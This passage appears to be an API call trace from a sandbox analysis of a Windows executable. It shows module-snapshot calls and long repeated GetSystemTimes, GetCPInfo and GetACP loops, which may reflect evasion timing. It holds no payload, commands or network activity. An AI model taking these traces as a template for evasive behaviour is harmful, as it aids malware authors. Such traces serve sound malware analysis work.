(lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0178.376] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x5811f8) returned 0x80 [0178.376] GetLastError () returned 0x0 [0178.376] SetLastError (dwErrCode=0x0) [0178.376] GetLastError () returned 0x0 [0178.376] SetLastError (dwErrCode=0x0) [0178.376] GetLastError () returned 0x0 [0178.376] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.377] SetLastError (dwErrCode=0x0) [0178.377] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.378] SetLastError (dwErrCode=0x0) [0178.378] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.379] SetLastError (dwErrCode=0x0) [0178.379] GetLastError () returned 0x0 [0178.380] SetLastError (dwErrCode=0x0) [0178.380] GetLastError () returned 0x0 [0178.380] SetLastError (dwErrCode=0x0) [0178.380] GetLastError () returned 0x0 [0178.380] SetLastError (dwErrCode=0x0) [0178.380] GetLastError () returned 0x0 [0178.380] SetLastError (dwErrCode=0x0) [0178.380] GetLastError () returned 0x0 [0178.380] SetLastError (dwErrCode=0x0) [0178.380] GetLastError () returned 0x0 [0178.380] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0178.381] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0178.381] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0178.381] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0178.384] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0178.384] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0178.384] GetTickCount () returned 0x1156420 [0178.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.431] GetACP () returned 0x4e4 [0178.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.431] GetACP () returned 0x4e4 [0178.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.431] GetACP () returned 0x4e4 [0178.431] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.431] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.431] GetACP () returned 0x4e4 [0178.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.432] GetACP () returned 0x4e4 [0178.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.432] GetACP () returned 0x4e4 [0178.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.432] GetACP () returned 0x4e4 [0178.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.432] GetACP () returned 0x4e4 [0178.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.432] GetACP () returned 0x4e4 [0178.432] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.432] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.433] GetACP () returned 0x4e4 [0178.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.433] GetACP () returned 0x4e4 [0178.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.433] GetACP () returned 0x4e4 [0178.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.433] GetACP () returned 0x4e4 [0178.433] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.433] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.434] GetACP () returned 0x4e4 [0178.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.434] GetACP () returned 0x4e4 [0178.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.434] GetACP () returned 0x4e4 [0178.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.434] GetACP () returned 0x4e4 [0178.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.434] GetACP () returned 0x4e4 [0178.434] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.434] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.435] GetACP () returned 0x4e4 [0178.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.435] GetACP () returned 0x4e4 [0178.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.435] GetACP () returned 0x4e4 [0178.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.435] GetACP () returned 0x4e4 [0178.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.435] GetACP () returned 0x4e4 [0178.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.435] GetACP () returned 0x4e4 [0178.435] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.435] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.436] GetACP () returned 0x4e4 [0178.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.436] GetACP () returned 0x4e4 [0178.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.436] GetACP () returned 0x4e4 [0178.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.436] GetACP () returned 0x4e4 [0178.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.436] GetACP () returned 0x4e4 [0178.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.436] GetACP () returned 0x4e4 [0178.436] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.436] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.437] GetACP () returned 0x4e4 [0178.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.437] GetACP () returned 0x4e4 [0178.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.437] GetACP () returned 0x4e4 [0178.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.437] GetACP () returned 0x4e4 [0178.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.437] GetACP () returned 0x4e4 [0178.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.437] GetACP () returned 0x4e4 [0178.437] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.438] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.438] GetACP () returned 0x4e4 [0178.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.439] GetACP () returned 0x4e4 [0178.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.439] GetACP () returned 0x4e4 [0178.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.439] GetACP () returned 0x4e4 [0178.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.439] GetACP () returned 0x4e4 [0178.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.439] GetACP () returned 0x4e4 [0178.439] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.440] GetACP () returned 0x4e4 [0178.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.440] GetACP () returned 0x4e4 [0178.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.440] GetACP () returned 0x4e4 [0178.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.440] GetACP () returned 0x4e4 [0178.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.440] GetACP () returned 0x4e4 [0178.440] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.440] GetACP () returned 0x4e4 [0178.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.441] GetACP () returned 0x4e4 [0178.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.441] GetACP () returned 0x4e4 [0178.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.441] GetACP () returned 0x4e4 [0178.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.441] GetACP () returned 0x4e4 [0178.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.441] GetACP () returned 0x4e4 [0178.441] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.441] GetACP () returned 0x4e4 [0178.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.442] GetACP () returned 0x4e4 [0178.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.442] GetACP () returned 0x4e4 [0178.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.442] GetACP () returned 0x4e4 [0178.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.442] GetACP () returned 0x4e4 [0178.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.442] GetACP () returned 0x4e4 [0178.442] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0178.442] GetACP () returned 0x4e4 [0178.443] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0178.443] GetCPInfo 